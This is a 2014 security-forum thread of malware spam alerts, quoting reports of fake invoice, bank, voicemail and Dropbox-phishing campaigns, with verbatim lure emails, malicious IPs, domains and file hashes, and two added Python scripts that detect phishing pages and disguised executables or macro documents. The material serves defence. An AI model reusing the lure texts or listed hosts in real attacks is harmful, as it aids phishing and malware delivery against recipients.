You are also being charged debt recovery costs and statutory interest of 8% above the reference rate (fixed for the six month period within which date the invoices became overdue) pursuant to the late payment legislation.
To stop this from happening please pay in full now the overdue invoice which is also attached to this letter.
Yours truly,
signature-Mishenko.gif (626×272)
Nadine Cox,
Accountant
Acorn Engineering Limited
Enclosure (Attachment)

20 October 2014: Copy4313_B0.zip: Extracts to: Invoice_7380901925299.xls.exe
Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft Excel xls file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/02b93640df6c19e6e77de029688e7dc2cdf6cf0a8a8f68ea0e1777d2ddd98097/analysis/1413800273/
___

Fake PDF invoice SPAM
- http://www.symantec.com/connect/blogs/pdf-invoices-may-cost-more-you-expect
Oct 20, 2014 - "... Over the past week, Symantec has observed a spam campaign involving suspicious emails that masquerade as unpaid invoices. However, these suspicious emails come with a nasty surprise attached in the form of a malicious .pdf file.
Malicious .pdf file attached to suspicious email:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_19.png
While these invoices may appear to be legitimate because the sender’s email address may be associated with a major company, the emails contain spelling errors in the subject line and the body of the email contains just one line of text. Most business emails contain a personal greeting to the recipient and the sender’s signature, but these emails have neither. These signs should serve as warnings to users that the email is not what it claims to be. The attached .pdf file has malicious shellcode hidden inside of it that will be executed when opened with a vulnerable version of Adobe Reader... attackers are trying to exploit the Adobe Acrobat and Reader Unspecified Remote Integer Overflow Vulnerability (CVE-2013-2729) by triggering the vulnerability while parsing the crafted Bitmap encoded image... The embedded shellcode acts as a downloader which downloads a malicious executable file (Infostealer.Dyranges) from a remote location. The downloaded malware attempts to install itself as a service called “google update service”... If successful, the malware is then able to steal confidential information entered into Web browsers by the user. Symantec recommends that users exercise caution when opening emails and attachments from unexpected or unknown senders. We also advise that PDF viewers and security software be kept up-to-date. Symantec detects the malicious .pdf file used in this campaign as Trojan.Pidief*."
* http://www.symantec.com/security_response/writeup.jsp?docid=2009-121708-1022-99&tabid=2
___

Fake 'LogMeIn Security Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/october-16-2014-logmein-security-update-fake-pdf-malware/
20 Oct 2014 - "An email that says it is an announcement that you need to install a new 'LogMeIn security certificate' which pretends to come from LogMeIn .com < auto-mailer@ logmein .com > with a subject of October 16, 2014 'LogMeIn Security Update' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/LogMeIn-security-update.png

20 October 2014: cert_client.zip: Extracts to: cert_1020.scr
Current Virus total detections: 1/52*. This October 16, 2014 'LogMeIn Security Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a legitimate file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/19d11eec77e1f1b6179005277d67a8640b5f5bf573dac486c7e1e6baea227c59/analysis/1413811609/
___

Fake 'my new photo ;)' SPAM - trojan variant
- http://blog.mxlab.eu/2014/10/20/latest-email-my-new-photo-contains-a-new-trojan-variant/
Oct 20, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “my new photo ;)”... sent from the spoofed email addresses and has the following short body:

my new photo ;)

The attached ZIP file has the name photo.zip; once extracted, a folder named photo is available that contains the 57 kB file photo.exe. The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen. At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en-gb/file/83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5/analysis/1413812842/
___

Fake Invoice SPAM – word doc malware
- http://myonlinesecurity.co.uk/adobe-invoice-word-doc-malware/
20 Oct 2014 - "An email pretending to come from Adobe with the subject of 'Adobe Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has an attachment that looks like a proper word.doc but something has disinfected all copies on its travels. All copies that I have received have been -less- than 1kb in size and are empty files with a name only adb-102288-invoice.doc . They are almost certainly supposed to be the typical malformed word docs, containing a macro script -virus-, that we have been seeing so much recently and that will infect you if you open or even preview them when you have an out of date or vulnerable version of Microsoft word on your computer... The email looks like:
Adobe(R) logo
Dear Customer,
Thank you for signing up for Adobe Creative Cloud
Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service...

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most (if not all) malicious files that are attached to emails will have a faked extension..."

- http://blog.dynamoo.com/2014/10/adobe-billing-adobe-invoice-spam-adb.html
20 Oct 2014
Screenshot: https://1.bp.blogspot.com/-mt-vGbR2Q-U/VEUFltRbPGI/AAAAAAAAF3E/b3_TOFcDpHk/s1600/adobe.png
> https://www.virustotal.com/en-gb/file/bc79dea26a2ec94646dcbad540d3921198c46701359539925e530839aa68fb13/analysis/1413809174/
... Behavioural information
TCP connections
62.75.182.94: https://www.virustotal.com/en-gb/ip-address/62.75.182.94/information/
208.89.214.177: https://www.virustotal.com/en-gb/ip-address/208.89.214.177/information/
___

Dropbox phish - hosted on Dropbox
- http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox
Updated: 18 Oct 2014 - "... In this scam, messages included links to a -fake- Google Docs login page hosted on Google itself. We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a -fake- Dropbox login page, hosted on Dropbox itself.
Fake Dropbox login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%201.png
The -fake- login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing. The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well. After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Security warning:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%202.jpg
Upon saving or emailing the user's credentials to the scammer, the PHP script simply -redirects- the user to the real Dropbox login page. Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications. Symantec reported this phishing page to Dropbox and they immediately took the page down..."

:fear::fear: :mad:
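The Dropbox write-up above boils down to two things a page inspector can test for without a browser: a sign-in form whose action posts the credentials to a host other than the one serving the page, and http:// sub-resources on an https page (the mixed-content warning it mentions). The script below is an added example, not code from Symantec or Dropbox; the page URL, hostnames and HTML it checks are constructed for the demonstration.

```python
"""Static checks for a suspected credential-phishing page.

Added example, not code from the Symantec post or from Dropbox.  Given the URL
a page was served from and its HTML, it reports two of the signals described
above: a login form (one with a password field) whose action posts to a
different host than the page itself, and sub-resources fetched over plain http
on an https page (mixed content).  The page URL, hostnames and HTML below are
constructed for the demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Tags whose attribute names a sub-resource the browser will fetch.
RESOURCE_ATTRS = {"img": "src", "script": "src", "iframe": "src",
                  "embed": "src", "link": "href"}


class PhishPageParser(HTMLParser):
    """Collects forms (action + whether they ask for a password) and resource URLs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.resources = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True
        attr = RESOURCE_ATTRS.get(tag)
        if attr and a.get(attr):
            self.resources.append(a[attr])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def analyse_page(page_url, html):
    """Return a list of (finding, url) pairs; an empty list means no signal fired."""
    parser = PhishPageParser()
    parser.feed(html)
    page = urlparse(page_url)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # Resolve relative actions against the page URL before comparing hosts.
        action = urlparse(urljoin(page_url, form["action"]))
        if action.hostname != page.hostname:
            findings.append(("cross-origin-credential-post", action.geturl()))
        if action.scheme == "http":
            findings.append(("credential-post-over-http", action.geturl()))
    if page.scheme == "https":
        for res in parser.resources:
            url = urlparse(urljoin(page_url, res))
            if url.scheme == "http":
                findings.append(("mixed-content", url.geturl()))
    return findings


# Constructed stand-in for the page described above: served over https from a
# file-hosting user-content domain, stylesheet and logo over plain http, and a
# sign-in form posting to a PHP script on some other (compromised) host.
SAMPLE_PAGE_URL = "https://usercontent.filehost.example/u/1234/login.html"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="http://cdn.filehost.example/css/login.css">
</head><body>
<img src="http://cdn.filehost.example/img/logo.png">
<form method="post" action="https://compromised-site.example/~user/dbx/post.php">
  <input type="email" name="email">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding, url in analyse_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{finding:32} {url}")
```

The cross-origin check is the one that matters: a real Dropbox login page posts to Dropbox, so a password form on a user-content hostname that posts anywhere else is by itself a strong indicator, regardless of whether the post goes over SSL.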

AplusWebMaster
2014-10-21, 15:06
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/humber-merchants-group-industrial-invoices-word-doc-malware/
21 Oct 2014 - "An email pretending to come from 'Humber Merchants Group' ps [random number]@humbermerchants .co.uk with a word document attachment and the subject of 'Industrial Invoices' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Attached are accounting documents from Humber Merchants
Humber Merchants Group
Head Office:
Parkinson Avenue
Scunthorpe
North Lincolnshire
DN15 7JX
Tel: 01724 860331
Fax: 01724 281326 ...

21 October 2014: 15040BII3646501.doc - Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2471f4a0febbfede40f5d700553eb28d97519ac49454bcc79f0fb7383559198b/analysis/1413890645/
___

Fake Adobe Invoice Spam
- http://threattrack.tumblr.com/post/100594804508/adobe-invoice-spam
Oct 21, 2014 - "Subjects Seen:
Adobe Invoice
Typical e-mail details:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a62cae97486096c615aa19538d2b5ebb/tumblr_inline_ndt0qkAetU1r6pupn.png

Malicious File Name and MD5:
invoice.zip (CABA79FCEB5C9FEF222C89C423AA2485)
invoice.exe (29684FBB98C1883A7A08977CB23E90B6)

Tagged: Adobe, Wauchos
___

Fake Invoice SPAM - malware
- http://myonlinesecurity.co.uk/please-find-attached-pi-copies-invoice-malware/
21 Oct 2014 - "An email pretending to come from cato-chem .com < sales@ cato-chem .com > with a fake invoice and a subject of 'Please find attached PI copies of Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/cato-chem_fake-invoice.png

21 October 2014: proforma invoice.zip: Extracts to proforma invoice.exe
Current Virus total detections: 17/54*. This 'Please find attached PI copies of Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a barcode as the icon instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/331d8fbfd2eecd6141a0bc61d3091c1d7e0311a0d8b6c0a29e500052f99c1ac2/analysis/1413858604/
___

ThetaRay turns to maths to detect cyber threats
- http://www.reuters.com/article/2014/10/21/us-thetaray-cybersecurity-idUSKCN0IA1JV20141021
Oct 21, 2014 - "As businesses face a growing threat of cyber attacks, Israeli start-up ThetaRay is betting on maths to provide early detection, enabling the shutdown of systems before damage can be done. The year-old company's first investor was venture capital firm Jerusalem Venture Partners. It is now also backed by heavyweights like General Electric, which uses ThetaRay to protect critical infrastructure such as power plants, and Israel's biggest bank, Hapoalim, which deployed the technology to detect bank account anomalies... Cyber security providers are moving away from protecting gateways with defenses such as firewalls to focus on detecting and preventing attacks before they penetrate organizations... Security experts estimate it can take more than -200- days to identify a cyber attack once it's been launched... Once a threat has been detected, ThetaRay leaves it up to humans to decide whether or not to shut down the system..."

:mad: :fear:

AplusWebMaster
2014-10-22, 16:14
FYI...

Fake Debt Recovery SPAM - PDF malware
- http://myonlinesecurity.co.uk/bd-digital-supplies-commercial-debt-recovery-fake-pdf-malware/
22 Oct 2014 - "An email coming from random senders pretending to be B&D Digital Supplies or B&D Computers, which is all about debt recovery and threatening legal action, with a subject of 'Commercial Debt Recovery', Ref No: [random numbers] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/commercial-debt-recovery.png

Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Fake customer service SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-service-word-doc-malware/
22 Oct 2014 - "An email pretending to have a word document invoice attachment with a subject of 'Reference: [random characters]' coming from [random name] 'customer service' at an unspecified company is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

This email contains an invoice file attachment ID:VZY563200VA
Thanks!
Kelli Horn .

22 October 2014: ENC094126XJ.doc - Current Virus total detections: 0/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e/analysis/1413973355/
___

Fake Malformed or infected word docs with embedded macro viruses
- http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
22 Oct 2014 - "We are seeing loads of emails with malformed or infected Word docs with embedded macro viruses. They have what appears to be a genuine Word doc attached, which is malformed and contains a macro or VBA script virus. Modern versions of Microsoft Office, that is Office 2010, 2013 and Office 365, have macros disabled by default, UNLESS you or your company have enabled them. Opening this malicious Word document will infect you if macros are enabled, and simply previewing it in Windows Explorer or your email client might well be enough to infect you... Do -not- open Word docs received in an email without scanning them with your antivirus first, and be aware that there are a lot of dodgy Word docs spreading that WILL infect you with no action from you if you are still using an outdated or vulnerable version of Word. This is a good reason to update your Office programs to a recent version and stop using Office 2003 and 2007. The risks in using older versions are starting to outweigh the convenience, benefits and cost of keeping an old version going... All modern versions of Word and other Office programs, that is 2010, 2013 and 365, should open Word docs, Excel files, PowerPoint etc. that are downloaded from the web or received in an email automatically in “protected view”, which stops any embedded malware or macros from being displayed and running. Make sure protected view is set in all Office programs to protect you and your company from these sorts of attacks..."

- http://blog.dynamoo.com/2014/10/this-email-contains-invoice-file.html
22 Oct 2014
Screenshot: https://3.bp.blogspot.com/-1zwDnotABo4/VEeoiHJ74iI/AAAAAAAAF3Y/mKs9rkfW_oY/s1600/image1.gif
VT1: https://www.virustotal.com/en-gb/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413981604/
... Behavioural information
DNS requests
VBOXSVR.ovh.net: 213.186.33.6: https://www.virustotal.com/en-gb/ip-address/213.186.33.6/information/
TCP connections
178.250.243.114: https://www.virustotal.com/en-gb/ip-address/178.250.243.114/information/
91.240.238.51: https://www.virustotal.com/en-gb/ip-address/91.240.238.51/information/
VT2: https://www.virustotal.com/en-gb/file/73602b79321bc8190aed0aa9dd8ea0ef8997a37e92a64932ec258cb1b74f0788/analysis/1413982865/
___

Fake Wells Fargo SPAM – PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-new-secure-message-fake-pdf-malware/
22 Oct 2014 - "An email pretending to come from Wells Fargo with a subject of 'You have a new Secure Message' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a secure message
Read your secure message by download AccountDocuments-10345.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting...

22 October 2014: document_013982_pdf.zip: Extracts to: document_013982_pdf.exe
Current Virus total detections: 5/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/de18e69c371dbd2f684e2dbcb40fa768c5ed8739182e75f4be90d81907e9e247/analysis/1413986180/
... Behavioural information
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
82.98.161.71: https://www.virustotal.com/en-gb/ip-address/82.98.161.71/information/
188.165.237.144: https://www.virustotal.com/en-gb/ip-address/188.165.237.144/information/
80.157.151.17: https://www.virustotal.com/en-gb/ip-address/80.157.151.17/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en-gb/ip-address/173.194.71.127/information/
___

Flash Player exploit in-the-wild - CVE-2014-0569
- https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Oct 22, 2014 - "... less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569*) was patched and made public:
* https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
The vulnerability had been privately reported to Adobe through the Zero Day Initiative group, giving the firm the time to fix the issue before it became known to the world. Typically security researchers and criminals will be very attentive to such news and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that PoC is weaponized by the bad guys... Kafeine**... stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one -week- after the official security bulletin had been published... That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/FiestaCVE-2014-0569.png
It is crucial to patch any system running outdated Flash Player versions as soon as possible! You can check the version you are running (make sure to do this in all the browsers you use) by going here:
>> http://www.adobe.com/software/flash/about/
The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches -sooner- rather than later..."
** http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html

> https://blog.malwarebytes.org/tag/fiesta-ek/

:mad: :fear:
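Two attachment lures keep recurring in the posts above: a ZIP whose member is an executable named to look like a PDF or invoice (so that with file extensions hidden only the icon and the "pdf" part show), and a Word document that carries a VBA project. The script below is an added example, not code from myonlinesecurity.co.uk or dynamoo.com, that triages both kinds at the mail gateway. The lure archive, the OOXML documents and the OLE2 stub it checks are constructed in memory; "setup.scr" is a made-up name, the other two member names are the ones reported in the Wells Fargo and Adobe runs.

```python
"""Triage of e-mail attachments for the two lures in the posts above: archives
that hide an executable behind a document-looking name, and Word files that
carry a VBA project.

Added example, not code from myonlinesecurity.co.uk or dynamoo.com.  The lure
archive, the OOXML documents and the OLE2 stub built at the bottom are
constructed in memory so the script runs offline; real attachments would be
passed in as the bytes read from the mail store.  The OLE2 test is a byte-scan
heuristic for the storage names Word and Excel use, not a full directory parse.
"""
import io
import re
import zipfile

# Extensions Windows will run on double-click.  Lure names end in "_pdf.exe" or
# ".scr" so that with "hide extensions for known file types" only the icon and
# the "pdf" part are visible.
EXEC_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
             "vbs", "vbe", "wsf", "hta", "cpl"}
DOC_WORDS = re.compile(r"pdf|doc|xls|invoice|fax|voice|scan|statement", re.I)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# OLE2 directory entries hold names as UTF-16LE; these are the macro containers.
OLE_VBA_NAMES = [s.encode("utf-16-le") for s in ("Macros", "_VBA_PROJECT")]


def risky_names(zip_bytes):
    """(member, reason) for every archive member that is an executable, flagging
    those whose stem is dressed up as a document or invoice."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            parts = name.rsplit("/", 1)[-1].lower().split(".")
            if len(parts) < 2 or parts[-1] not in EXEC_EXTS:
                continue
            stem = ".".join(parts[:-1])
            disguised = len(parts) > 2 or DOC_WORDS.search(stem) is not None
            hits.append((name, "executable-disguised-as-document" if disguised
                         else "executable"))
    return hits


def has_vba(doc_bytes):
    """True if an Office file carries VBA: vbaProject.bin inside OOXML (.docm/.xlsm,
    or a renamed .docx), or a Macros/_VBA_PROJECT entry in a legacy OLE2 .doc/.xls."""
    if doc_bytes[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
                return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
        except zipfile.BadZipFile:
            return False
    if doc_bytes[:8] == OLE_MAGIC:
        return any(marker in doc_bytes for marker in OLE_VBA_NAMES)
    return False


def build_samples():
    """Constructed test data: the lure archive, a macro-enabled and a macro-free
    OOXML document, and a fake OLE2 file (magic plus a 'Macros' entry name)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("document_013982_pdf.exe", b"MZ")   # name from the Wells Fargo run
        zf.writestr("invoice.exe", b"MZ")               # name from the Adobe Invoice run
        zf.writestr("setup.scr", b"MZ")                 # constructed, no document disguise
        zf.writestr("readme.txt", b"just text")
    lure_zip = buf.getvalue()

    def ooxml(with_macro):
        b = io.BytesIO()
        with zipfile.ZipFile(b, "w") as zf:
            zf.writestr("[Content_Types].xml", "<Types/>")
            zf.writestr("word/document.xml", "<w:document/>")
            if with_macro:
                zf.writestr("word/vbaProject.bin", b"\x00" * 16)
        return b.getvalue()

    fake_ole = OLE_MAGIC + b"\x00" * 504 + "Macros".encode("utf-16-le") + b"\x00" * 32
    return lure_zip, ooxml(True), ooxml(False), fake_ole


if __name__ == "__main__":
    lure_zip, docm, docx, ole = build_samples()
    for member, reason in risky_names(lure_zip):
        print(f"{member:28} {reason}")
    for label, data in (("docm", docm), ("docx", docx), ("ole2", ole)):
        print(f"{label:28} vba={has_vba(data)}")
```

The archive check is deliberately on the member name inside the ZIP, not on the ZIP's own name, because the outer file is always innocuous ("document_013982_pdf.zip"); and the VBA check looks at the bytes, not the extension, because a .docm renamed to .doc still opens in Word with its macros intact.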

AplusWebMaster
2014-10-23, 15:46
FYI...

Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This fake Order Confirmation spam pretends to come from supertouch.com / Allied International Trading Limited but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...

In the sample I received, the attachment was -corrupt- but should have been a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run[1] (read that post for more details) and is very poorly detected, although blocking access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "

[1] http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html

62.75.182.94: https://www.virustotal.com/en/ip-address/62.75.182.94/information/
___

Fake 'bank detail' SPAM - trojan
- http://blog.mxlab.eu/2014/10/23/fake-email-regarding-bitstamp-new-banking-details-contains-trojan/
Oct 23, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “New bank details”. This email is sent from the spoofed address “Bitstamp .net” <no_reply@ bitstamp .net>, while the real SMTP sender is AmericanExpress@ welcome .aexp .com, and has the following body:
New banking details
Dear Bitstamp clients,
We would like to inform you that Bitstamp now has new bank details, please check attached file.
We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.
Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.
Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.
Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED

The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr. The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S. At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total*. Now, MX Lab has also intercepted some emails -without- the malicious attachment but be aware that this email is a risk..."
* https://www.virustotal.com/en/file/83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769/analysis/1414073432/
... Behavioural information
DNS requests
VBOXSVR. ovh .net: 213.186.33.6: https://www.virustotal.com/en/ip-address/213.186.33.6/information/
___

Two exploit kits prey on Flash Player flaw patched only last week
- http://net-security.org/malware_news.php?id=2892
23.10.2014 - "Two exploit kits prey on Flash Player flaw patched only last week... The integer overflow vulnerability in question (CVE-2014-0569*) can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical (high impact, easily exploitable)... the time period was very short, and technical information about the vulnerability and exploit code hasn't yet been shared online... The exploit kits are used to deliver the usual assortment of malware, and some of the variants have an extremely low detection rate... If you use Adobe Flash Player, and you haven't implemented the latest patches, now would be a good time to rectify that mistake."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569 - 10.0

- http://atlas.arbor.net/briefs/index#1049793989
Elevated Severity
23 Oct 2014

- http://www.securitytracker.com/id/1031019
CVE Reference: CVE-2014-0558, CVE-2014-0564, CVE-2014-0569
Oct 14 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Solution: The vendor has issued a fix (13.0.0.250 extended support release, 15.0.0.189 for Windows/Mac, 11.2.202.411 for Linux)...
Flash 15.0.0.189 released: https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
Oct 14, 2014

For I/E: http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_active_x.exe

For Firefox (Plugin-based browsers): http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_plugin.exe

Flash test site: http://www.adobe.com/software/flash/about/
___

Fake VoiceMail SPAM
- http://blog.dynamoo.com/2014/10/voice-mail-voicemailsendervoicemailcom.html
23 Oct 2014 - "Before you open something like this.. think if you really get voice mail notifications through your email. No? Well, -don't- open it.
From: "Voice Mail" [voicemail_sender@ voicemail .com]
Date: Thu, 23 Oct 2014 14:31:22 +0200
Subject: voice message from 598-978-8974 for mailbox 833
You have received a voice mail message from 598-978-8974
Message length is 00:00:33. Message size is 264 KB.
Download your voicemail message from dropbox service below (Google Disk
Drive Inc.) ...

Clicking the link goes to a script that detects if the visitor is running Windows, if so it downloads a file doc_9231-92_pdf.zip from the target system which in turn contains a malicious executable doc_9231-92_pdf.exe which has a VirusTotal detection rate of 4/51*... 188.165.214.6 is rather unsurprisingly allocated to OVH France. It also drops a couple of executables onto the system... Recommended blocklist:
188.165.214.6
inaturfag .com "
* https://www.virustotal.com/en-gb/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414075720/
___

Fake BoA SPAM – PDF malware
- http://myonlinesecurity.co.uk/mamie-french-bank-america-unknown-incoming-wire-fake-pdf-malware/
23 Oct 2014 - "'Mamie French Bank of America Unknown incoming wire' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: $ 6,200.00
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00 a.m., June 24, 2014.
Thank you.
Mamie French
Senior Accountant
Bank of America ...

23 October 2014: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.scr
Current Virus total detections: 10/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
